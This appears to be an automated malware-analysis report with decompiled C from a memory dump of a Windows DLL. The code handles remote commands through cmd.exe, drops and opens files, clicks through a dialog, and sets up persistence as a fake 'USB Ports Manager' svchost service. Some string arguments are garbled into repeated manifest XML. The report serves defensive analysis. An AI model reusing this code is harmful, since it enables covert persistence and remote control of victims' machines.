								__eflags = _t271 - 0x539b9257;
								if(_t271 != 0x539b9257) {
									_t264 =  *(_t283 + 0x10);
									_t159 = ExpandEnvironmentStringsA( *(_t264 + 8), _t283 + 0x34, 0x104);
									__eflags = _t159;
									if(_t159 == 0) {
										L63:
										wsprintfA(_t283 + 0x38, "%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD",  *(_t264 + 8));
										_t283 = _t283 + 0x10;
										L64:
										_t163 = StrRChrA(_t283 + 0x38, 0, 0x5c);
										_t265 = _t163;
										__eflags = _t265;
										if(_t265 != 0) {
											 *_t265 = 0;
										}
										__imp__SHCreateDirectoryExA(0, _t283 + 0x34, 0);
										__eflags = _t265;
										if(_t265 != 0) {
											 *_t265 = 0x5c;
										}
										__eflags = _t163;
										if(_t163 == 0) {
											L71:
											_push(_t283 + 0x30);
											_push( *((intOrPtr*)( *(_t283 + 0x10) + 4)));
											_t281 = E6ECA5A00();
											_t283 = _t283 + 8;
											__eflags = _t281;
											if(_t281 == 0) {
												goto L77;
											}
											__eflags = _t271 - 0xb3beafae;
											if(_t271 != 0xb3beafae) {
												__eflags = _t271 - 0x539b9257;
												if(_t271 != 0x539b9257) {
													goto L77;
												}
												_t168 = E6ECA2750(_t283 + 0x30);
												_t283 = _t283 + 4;
												L76:
												_t281 = _t168;
												goto L77;
											}
											_push(0);
											_push(0);
											_push(1);
											_t168 = E6ECA4230("open", _t283 + 0x40, 0);
											_t283 = _t283 + 0x18;
											goto L76;
										} else {
											__eflags = _t163 - 0x50;
											if(_t163 == 0x50) {
												goto L71;
											}
											__eflags = _t163 - 0xb7;
											if(_t163 != 0xb7) {
												L77:
												E6ECA5AF0(_t209, _t281, 0, 0);
												_t280 =  *(_t283 + 0x20);
												_t283 = _t283 + 0x10;
												goto L130;
											}
											goto L71;
										}
									}
									_t169 = PathIsRelativeA(_t283 + 0x30);
									__eflags = _t169;
									if(_t169 == 0) {
										goto L64;
									}
									goto L63;
								}
								wsprintfA(_t283 + 0x3c, "%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD",  *((intOrPtr*)( *(_t283 + 0x10) + 8)), ".pdll");
								_t283 = _t283 + 0x14;
								goto L64;
							}
							E6ECA5AF0(_t209, 2, 0, 0);
							_t283 = _t283 + 0x10;
							goto L130;
						}
						__eflags = _t271 - 0x94a62224;
						if(__eflags > 0) {
							__eflags = _t271 - 0x98666ff0;
							if(_t271 != 0x98666ff0) {
								goto L115;
							}
							 *((intOrPtr*)(_t283 + 0x14)) = GetTickCount();
							_t174 = RtlRandom(_t283 + 0x10);
							_push(".cab");
							_t227 = _t283 + 0x34;
							__eflags =  *(_t283 + 0x18) - 1;
							if( *(_t283 + 0x18) <= 1) {
								_push( *_t280);
								_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
								wsprintfA(_t227, "%s%s%s");
								_t291 = _t283 + 0x14;
							} else {
								_push(_t174);
								_push(0x75);
								_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
								wsprintfA(_t227, "%s%c%lu%s");
								_t291 = _t283 + 0x18;
							}
							__eflags =  *((intOrPtr*)(_t291 + 0x14)) - 1;
							if( *((intOrPtr*)(_t291 + 0x14)) <= 1) {
								L53:
								_t177 = GetFileAttributesA(_t291 + 0x30);
								__eflags = _t177 - 0xffffffff;
								if(_t177 == 0xffffffff) {
									L106:
									E6ECA5AF0(_t209, 0, 0, 0);
									_t283 = _t291 + 0x10;
									goto L130;
								}
								goto L54;
							} else {
								_push(_t291 + 0x30);
								_push( *((intOrPtr*)(_t280 + 4)));
								_t185 = E6ECA5A00();
								_t291 = _t291 + 8;
								__eflags = _t185;
								if(_t185 != 0) {
									L54:
									_t180 = E6ECA2DC0(_t291 + 0x38, "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", 1);
									_t283 = _t291 + 0xc;
									__eflags = _t180;
									if(_t180 != 0) {
										E6ECA5AF0(_t209, 1, 0, 0);
										E6ECA5060(5, 1, 0);
										_t283 = _t283 + 0x1c;
									}
									DeleteFileA(_t283 + 0x30);
									goto L130;
								}
								goto L53;
							}
						}
						if(__eflags == 0) {
							goto L57;
						}
						__eflags = _t271 - 0x5d22927c;
						if(_t271 == 0x5d22927c) {
							 *(_t283 + 0x1c) = GetTickCount();
							wsprintfA(_t283 + 0x24, "%lu", RtlRandom(_t283 + 0x1c));
							_t256 = M6ECB04CC; // 0xcb2da8
							_t283 = _t283 + 0xc;
							_t257 = M6ECB04F0; // 0x0
							 *(_t283 + 0x20) = 0x6467;
							 *((char*)(_t283 + 0x22)) = 0;
							_t193 = WritePrivateProfileStringA(_t257, _t283 + 0x18, _t283 + 0x24, _t256);
							__eflags = _t193;
							if(_t193 != 0) {
								goto L107;
							}
							goto L106;
						}
						__eflags = _t271 - 0x876bcf36;
						if(_t271 == 0x876bcf36) {
							goto L13;
						}
						E6ECA5AF0(_t209, 4, 0, 0);
						_t283 = _t283 + 0x10;
						goto L130;
					}
					if(_t298 == 0) {
						goto L57;
					}
					_t299 = _t271 - 0x2a4ba2d1;
					if(_t299 > 0) {
						__eflags = _t271 - 0x2f1f4648;
						if(_t271 == 0x2f1f4648) {
							goto L13;
						}
						__eflags = _t271 - 0x4231ab60;
						if(_t271 == 0x4231ab60) {
							L37:
							_t258 =  *0x6ecb0398; // 0x0
							PostMessageA(GetDlgItem(_t258, 0x4e83), 0x111, 0x9cb6, 0);
							_t197 =  *0x6ecb039c; // 0x0
							PostMessageA(_t197, 0x201, 1, 0x490017);
							Sleep(0x64);
							_t232 =  *0x6ecb039c; // 0x0
							PostMessageA(_t232, 0x202, 0, 0x490017);
							Sleep(0x7d0);
							E6ECA5AF0(_t209, 1, 0, 0);
							_t283 = _t283 + 0x10;
							goto L130;
						}
						__eflags = _t271 - 0x4779d712;
						if(_t271 == 0x4779d712) {
							goto L13;
						}
						E6ECA5AF0(_t209, 4, 0, 0);
						_t283 = _t283 + 0x10;
						goto L130;
					}
					if(_t299 == 0) {
						_t259 =  *((intOrPtr*)(_t283 + 0x14));
						__eflags = _t259 - 2;
						if(_t259 >= 2) {
							_t202 =  *((intOrPtr*)(_t280 + 4));
							_t233 =  *_t202;
							__eflags = _t233 - 0x69;
							if(_t233 != 0x69) {
								L21:
								__eflags = _t233 - 0x72;
								if(_t233 != 0x72) {
									goto L117;
								}
								__eflags =  *((char*)(_t202 + 1));
								if( *((char*)(_t202 + 1)) != 0) {
									goto L117;
								}
								_t234 = 0;
								__eflags = 0;
								L24:
								__eflags = _t259 - 2;
								if(_t259 <= 2) {
									L28:
									_t203 = 0;
									__eflags = 0;
									L29:
									_push(_t203);
									_push(_t234);
									_t204 = E6ECA44D0(_t209, _t262);
									_t291 = _t283 + 8;
									__eflags = _t204;
									if(_t204 == 0) {
										goto L106;
									}
									_t279 = 5;
									do {
										Sleep(0x3e8);
										_t279 = _t279 - 1;
										__eflags = _t279;
									} while (_t279 != 0);
									E6ECA5060(5, 1, _t279);
									_t283 = _t291 + 0xc;
									goto L130;
								}
								_t206 =  *((intOrPtr*)(_t280 + 8));
								__eflags =  *_t206 - 0x66;
								if( *_t206 != 0x66) {
									goto L28;
								}
								__eflags =  *((char*)(_t206 + 1));
								if( *((char*)(_t206 + 1)) != 0) {
									goto L28;
								}
								_t203 = 1;
								goto L29;
							}
							__eflags =  *((char*)(_t202 + 1));
							if( *((char*)(_t202 + 1)) != 0) {
								goto L21;
							}
							_t234 = 1;
							goto L24;
						} else {
							E6ECA5AF0(_t209, 2, 0, 0);
							_t283 = _t283 + 0x10;
							goto L130;
						}
					}
					if(_t271 == 0x76a0ce1) {
						E6ECA52B0(_t280, 0);
						_t283 = _t283 + 4;
						goto L130;
					}
					if(_t271 == 0x190cb7c3) {
						goto L37;
					}
					if(_t271 != 0x2965d6c5) {
						goto L115;
					}
					goto L13;
				}
			}

0x6eca5b47
0x6eca5b5a
0x6eca5b73
0x6eca5b75
0x6eca5b78
0x6eca5b7e
0x6eca6432
0x6eca6432
0x6eca6436
0x6eca643b
0x6eca6444
0x6eca6444
0x6eca6453
0x6eca6455
0x6eca645a
0x6eca6462
0x6eca6462
0x6eca646a
0x6eca6478
0x6eca6478
0x6eca5b89
0x6eca641f
0x6eca6420
0x00000000
0x6eca642c
0x6eca5b93
0x6eca5b9c
0x6eca5ba0
0x6eca5ba8
0x6eca6417
0x00000000
0x6eca641c
0x00000000
0x6eca5bae
0x6eca5bae
0x6eca5bbc
0x6eca5bc2
0x6eca5bc8
0x00000000
0x00000000
0x6eca5bd8
0x6eca5be8
0x6eca5bee
0x6eca5bf4
0x6eca5da5
0x6eca5dab
0x6eca6076
0x6eca607c
0x6eca62d0
0x6eca62d6
0x6eca5c2e
0x6eca5c33
0x6eca6394
0x6eca639a
0x6eca639d
0x6eca63a3
0x6eca63b9
0x6eca63b9
0x6eca63be
0x6eca63be
0x6eca63c4
0x6eca63d5
0x6eca63d5
0x6eca63d5
0x6eca63d7
0x6eca63d7
0x6eca63d9
0x6eca63da
0x6eca63f2
0x6eca63f7
0x00000000
0x6eca63f7
0x6eca63c6
0x6eca63cc
0x00000000
0x00000000
0x6eca63ce
0x00000000
0x6eca63ce
0x6eca63a5
0x6eca63ab
0x00000000
0x00000000
0x6eca63ad
0x6eca63b3
0x00000000
0x00000000
0x6eca63b5
0x00000000
0x6eca5c39
0x6eca5c40
0x6eca5c45
0x6eca63fa
0x6eca6408
0x00000000
0x6eca6408
0x6eca5c33
0x6eca62dc
0x6eca62e2
0x6eca6377
0x6eca6379
0x6eca637b
0x6eca605f
0x6eca6067
0x6eca6068
0x6eca6069
0x6eca606e
0x00000000
0x6eca606e
0x6eca62e8
0x6eca62ee
0x6eca6304
0x6eca6309
0x6eca6322
0x6eca633d
0x6eca6347
0x6eca6348
0x6eca634e
0x6eca6361
0x6eca636a
0x6eca636f
0x00000000
0x6eca636f
0x6eca630b
0x6eca6312
0x6eca6317
0x00000000
0x6eca6317
0x6eca62f0
0x6eca62f7
0x6eca62fc
0x00000000
0x6eca62fc
0x6eca6082
0x6eca6291
0x6eca6291
0x6eca6296
0x6eca62bd
0x6eca62c3
0x6eca62c8
0x00000000
0x6eca62c8
0x6eca6298
0x6eca629b
0x6eca629e
0x00000000
0x00000000
0x6eca62a0
0x6eca62a4
0x00000000
0x00000000
0x6eca62b0
0x6eca62b5
0x00000000
0x6eca62b5
0x6eca6088
0x6eca608e
0x6eca61bd
0x6eca61c2
0x6eca61c7
0x6eca61f3
0x6eca61f4
0x6eca61ff
0x6eca6205
0x6eca6219
0x6eca621e
0x6eca61c9
0x6eca61cf
0x6eca61de
0x6eca61e3
0x6eca61e3
0x00000000
0x6eca61c7
0x6eca6094
0x6eca609a
0x6eca614f
0x6eca6154
0x6eca6197
0x6eca61b0
0x6eca61b5
0x6eca6156
0x6eca6156
0x6eca615d
0x6eca6170
0x6eca6175
0x6eca6175
0x00000000
0x6eca6154
0x6eca60a0
0x6eca60a6
0x00000000
0x00000000
0x6eca60ac
0x6eca60b5
0x6eca60bb
0x6eca60bd
0x6eca613b
0x6eca6142
0x6eca6147
0x00000000
0x6eca6147
0x6eca60bf
0x6eca60cc
0x6eca60d2
0x6eca60d4
0x00000000
0x00000000
0x6eca60ed
0x6eca60f1
0x6eca60f9
0x6eca60ff
0x6eca6101
0x00000000
0x00000000
0x6eca610b
0x6eca6110
0x6eca6113
0x6eca6117
0x6eca6119
0x6eca611c
0x6eca611f
0x6eca6121
0x6eca6125
0x6eca6127
0x6eca6127
0x6eca6127
0x6eca6125
0x6eca611f
0x6eca612d
0x6eca6133
0x6eca6135
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca6135
0x6eca5db1
0x6eca6059
0x6eca605b
0x6eca605d
0x00000000
0x6eca605d
0x6eca5db7
0x6eca5dbd
0x6eca6022
0x6eca6028
0x6eca604c
0x6eca6051
0x00000000
0x6eca6051
0x6eca602a
0x6eca6030
0x00000000
0x00000000
0x6eca6032
0x6eca6038
0x00000000
0x00000000
0x6eca603e
0x6eca6040
0x6eca6042
0x00000000
0x6eca6042
0x6eca5dc3
0x6eca5edb
0x6eca5edb
0x6eca5ee0
0x6eca5ef6
0x6eca5ef8
0x6eca5efd
0x6eca5f03
0x6eca5f2e
0x6eca5f40
0x6eca5f46
0x6eca5f48
0x6eca5f59
0x6eca5f6e
0x6eca5f74
0x6eca5f77
0x6eca5f80
0x6eca5f86
0x6eca5f88
0x6eca5f8a
0x6eca5f8c
0x6eca5f8c
0x6eca5f98
0x6eca5f9e
0x6eca5fa0
0x6eca5fa2
0x6eca5fa2
0x6eca5fa5
0x6eca5fa7
0x6eca5fb5
0x6eca5fc0
0x6eca5fc1
0x6eca5fc7
0x6eca5fc9
0x6eca5fcc
0x6eca5fce
0x00000000
0x00000000
0x6eca5fd0
0x6eca5fd6
0x6eca5ff4
0x6eca5ffa
0x00000000
0x00000000
0x6eca6001
0x6eca6006
0x6eca6009
0x6eca6009
0x00000000
0x6eca6009
0x6eca5fd8
0x6eca5fda
0x6eca5fdc
0x6eca5fea
0x6eca5fef
0x00000000
0x6eca5fa9
0x6eca5fa9
0x6eca5fac
0x00000000
0x00000000
0x6eca5fae
0x6eca5fb3
0x6eca600b
0x6eca6011
0x6eca6016
0x6eca601a
0x00000000
0x6eca601a
0x00000000
0x6eca5fb3
0x6eca5fa7
0x6eca5f4f
0x6eca5f55
0x6eca5f57
0x00000000
0x00000000
0x00000000
0x6eca5f57
0x6eca5f23
0x6eca5f29
0x00000000
0x6eca5f29
0x6eca5ee9
0x6eca5eee
0x00000000
0x6eca5eee
0x6eca5dc9
0x6eca5dcf
0x6eca5e03
0x6eca5e09
0x00000000
0x00000000
0x6eca5e1a
0x6eca5e1e
0x6eca5e29
0x6eca5e2e
0x6eca5e32
0x6eca5e36
0x6eca5e5a
0x6eca5e5b
0x6eca5e62
0x6eca5e68
0x6eca5e38
0x6eca5e38
0x6eca5e3e
0x6eca5e40
0x6eca5e47
0x6eca5e4d
0x6eca5e4d
0x6eca5e6b
0x6eca5e6f
0x6eca5e86
0x6eca5e8b
0x6eca5e91
0x6eca5e94
0x6eca627d
0x6eca6284
0x6eca6289
0x00000000
0x6eca6289
0x00000000
0x6eca5e71
0x6eca5e78
0x6eca5e79
0x6eca5e7a
0x6eca5e7f
0x6eca5e82
0x6eca5e84
0x6eca5e9a
0x6eca5ea7
0x6eca5eac
0x6eca5eaf
0x6eca5eb1
0x6eca5eb9
0x6eca5ec3
0x6eca5ec8
0x6eca5ec8
0x6eca5ed0
0x00000000
0x6eca5ed0
0x00000000
0x6eca5e84
0x6eca5e6f
0x6eca5dd1
0x00000000
0x00000000
0x6eca5dd7
0x6eca5ddd
0x6eca622c
0x6eca6246
0x6eca624c
0x6eca6252
0x6eca6256
0x6eca6267
0x6eca626e
0x6eca6273
0x6eca6279
0x6eca627b
0x00000000
0x00000000
0x00000000
0x6eca627b
0x6eca5de3
0x6eca5de9
0x00000000
0x00000000
0x6eca5df6
0x6eca5dfb
0x00000000
0x6eca5dfb
0x6eca5bfa
0x00000000
0x00000000
0x6eca5c00
0x6eca5c06
0x6eca5cfc
0x6eca5d02
0x00000000
0x00000000
0x6eca5d08
0x6eca5d0e
0x6eca5d30
0x6eca5d30
0x6eca5d55
0x6eca5d57
0x6eca5d69
0x6eca5d73
0x6eca5d75
0x6eca5d88
0x6eca5d8f
0x6eca5d98
0x6eca5d9d
0x00000000
0x6eca5d9d
0x6eca5d10
0x6eca5d16
0x00000000
0x00000000
0x6eca5d23
0x6eca5d28
0x00000000
0x6eca5d28
0x6eca5c0c
0x6eca5c5c
0x6eca5c60
0x6eca5c63
0x6eca5c79
0x6eca5c7c
0x6eca5c7e
0x6eca5c81
0x6eca5c90
0x6eca5c90
0x6eca5c93
0x00000000
0x00000000
0x6eca5c99
0x6eca5c9d
0x00000000
0x00000000
0x6eca5ca3
0x6eca5ca3
0x6eca5ca5
0x6eca5ca5
0x6eca5ca8
0x6eca5cbf
0x6eca5cbf
0x6eca5cbf
0x6eca5cc1
0x6eca5cc1
0x6eca5cc2
0x6eca5cc3
0x6eca5cc8
0x6eca5ccb
0x6eca5ccd
0x00000000
0x00000000
0x6eca5cd9
0x6eca5ce0
0x6eca5ce5
0x6eca5ce7
0x6eca5ce7
0x6eca5ce7
0x6eca5cef
0x6eca5cf4
0x00000000
0x6eca5cf4
0x6eca5caa
0x6eca5cad
0x6eca5cb0
0x00000000
0x00000000
0x6eca5cb2
0x6eca5cb6
0x00000000
0x00000000
0x6eca5cb8
0x00000000
0x6eca5cb8
0x6eca5c83
0x6eca5c87
0x00000000
0x00000000
0x6eca5c89
0x00000000
0x6eca5c65
0x6eca5c6c
0x6eca5c71
0x00000000
0x6eca5c71
0x6eca5c63
0x6eca5c14
0x6eca5c4f
0x6eca5c54
0x00000000
0x6eca5c54
0x6eca5c1c
0x00000000
0x00000000
0x6eca5c28
0x00000000
0x00000000
0x00000000
0x6eca5c28

APIs

Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4

CharLowerA.USER32 ref: 6ECA5B93
GetProcessHeap.KERNEL32(00000008,00000400), ref: 6ECA5BB5
HeapAlloc.KERNEL32(00000000), ref: 6ECA5BBC
lstrlenA.KERNEL32 ref: 6ECA5BD2
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6ECA5BE1
Sleep.KERNEL32(000003E8), ref: 6ECA5CE5

Part of subcall function 6ECA5AF0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6ECA5B03
Part of subcall function 6ECA5AF0: PostThreadMessageA.USER32(00000000,000083FE,00000000,?), ref: 6ECA5B2E

GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA6401
HeapFree.KERNEL32(00000000), ref: 6ECA6408
LocalFree.KERNEL32(00000000), ref: 6ECA6420
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6ECA643B
CloseHandle.KERNEL32 ref: 6ECA6444
GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA6450
HeapFree.KERNEL32(00000000), ref: 6ECA6453
GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA645F
HeapFree.KERNEL32(00000000), ref: 6ECA6462
GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA6467
HeapFree.KERNEL32(00000000), ref: 6ECA646A

Strings

cmd.exe, xrefs: 6ECA6331, 6ECA63E0
open, xrefs: 6ECA5FE5
.pdll, xrefs: 6ECA5F12, 6ECA6158, 6ECA6186, 6ECA61C2
.cab, xrefs: 6ECA5E29
%s%c%lu%s, xrefs: 6ECA5E41
%s%s%s, xrefs: 6ECA5E5C, 6ECA5F1D, 6ECA6191, 6ECA61F9
gd, xrefs: 6ECA6267
%s%s, xrefs: 6ECA5F68
/c %s, xrefs: 6ECA638E
"%s%s" /c %s, xrefs: 6ECA6337
%lu, xrefs: 6ECA6240

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess$AllocLocallstrlen$CharCloseComputeCrc32CreateEventHandleLowerMessageObjectPostSingleSleepThreadWait
String ID: "%s%s" /c %s$%lu$%s%c%lu%s$%s%s$%s%s%s$.cab$.pdll$/c %s$cmd.exe$gd$open
API String ID: 2480811851-2674861874
Opcode ID: d35f200d620b980a017a02c93c1243927389470f1586e1b03c98fcebbd1ffff1
Instruction ID: 13ed21a76b6273e35215381ee1f0358bc49077d4248d7868d88d8459523ea0fe
Opcode Fuzzy Hash: d35f200d620b980a017a02c93c1243927389470f1586e1b03c98fcebbd1ffff1
Instruction Fuzzy Hash: 0B322AB1A54703BBE7109BEC8D45FAB7679EB45708F008818FB165B2C5F6B0DC458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3C60, Relevance: 98.4, APIs: 40, Strings: 16, Instructions: 398
registrystringserviceCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6ECA3C60() {
				char _v760;
				char _v772;
				char _v780;
				char _v1016;
				char _v1024;
				char _v1032;
				char _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				intOrPtr _v1052;
				int _v1056;
				intOrPtr _v1060;
				int _v1064;
				intOrPtr _v1068;
				int _v1072;
				int* _v1076;
				char _v1080;
				char* _v1084;
				char* _v1088;
				void* _v1092;
				void* _v1096;
				char _v1100;
				void* _v1104;
				void* _v1108;
				void* _v1112;
				int _v1116;
				void* _v1120;
				char* _v1124;
				void* _v1128;
				intOrPtr _v1132;
				char _v1140;
				void* _t80;
				void** _t85;
				char* _t99;
				int _t100;
				intOrPtr _t104;
				intOrPtr _t108;
				char* _t125;
				void* _t145;
				long _t151;
				char* _t173;
				CHAR* _t174;
				long _t182;
				char** _t196;
				char** _t199;
				char** _t200;
				char** _t201;
				char** _t202;
				char** _t203;
				intOrPtr _t207;
				intOrPtr _t220;

				_t196 =  &_v1124;
				_v1112 = 0;
				_t80 = OpenSCManagerA(0, 0, 0xf003f);
				_v1108 = _t80;
				if(_t80 != 0) {
					L2:
					_v1124 = 0;
					_t145 = OpenServiceA(_t80, "USBManager", 0xf01ff);
					if(_t145 != 0) {
						L14:
						_v1112 = 1;
						wsprintfA( &_v1044, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
						if(RegCreateKeyExA(0x80000002,  &_v1036, 0, 0, 0, 0xf023f, 0,  &_v1116, 0) == 0) {
							_push(0x105);
							_push( &_v1036);
							L6ECAC2EE();
							_v1120 = 0x105;
							_v1116 = 2;
							if(RegQueryValueExA(_v1124, "ServiceDLL", 0,  &_v1116,  &_v1044,  &_v1120) != 0) {
								L17:
								_t151 = M6ECB052C; // 0x21
								_t173 = M6ECB0524; // 0xcd1c70
								RegSetValueExA(_v1124, "ServiceDLL", 0, 2, _t173, _t151 + 1);
							} else {
								_t174 = M6ECB0524; // 0xcd1c70
								if(lstrcmpiA( &_v1044, _t174) != 0) {
									goto L17;
								}
							}
							RegCloseKey(_v1124);
						}
						L6ECAC2EE();
						_t85 =  &_v1104;
						_v1104 = 0;
						__imp__QueryServiceStatusEx(_t145, 0,  &_v1080, 0x24, _t85,  &_v1072, 0x24);
						if(_t85 == 0 || _v1096 != 4) {
							_t220 = M6ECB0544; // 0x1
							if(_t220 == 0) {
								_push(0);
								_push(0);
							} else {
								_push(1);
								_v1140 = "s";
								_push( &_v1140);
							}
							_push(_t145);
							E6ECA37D0();
						}
						CloseServiceHandle(_t145);
					} else {
						_t207 = M6ECB0544; // 0x1
						if(_t207 != 0) {
							_t99 = M6ECB053C; // 0xcb2cac
							_t100 = wsprintfA( &_v780, "%%SYSTEMROOT%%\\system32\\%s.exe -k \"%s\" -svcr \"%s\"", "svchost", "USBPortsManagerGrp", _t99);
							_t199 =  &(_t196[5]);
							_v1112 = _t100;
							_t145 = CreateServiceA(_v1100, "USBManager", "USB Ports Manager", 0xf01ff, 0x20, 2, 0,  &_v772, 0, 0, 0, 0, 0);
							if(_t145 != 0) {
								_v1072 = 1;
								_v1064 = 1;
								_v1056 = 1;
								_v1068 = 0x1388;
								_v1060 = 0x1388;
								_v1052 = 0x1388;
								_v1092 = 0;
								_v1084 = 0;
								_v1088 = 0;
								_v1080 = 3;
								_v1076 =  &_v1072;
								__imp__ChangeServiceConfig2A(_t145, 2,  &_v1092);
								_t104 =  *0x6ecb047c; // 0x0
								wsprintfA( &_v1048, "%s\\%s%c%s", _t104, "svchost", 0, 0x6ecad543);
								_t200 =  &(_t199[6]);
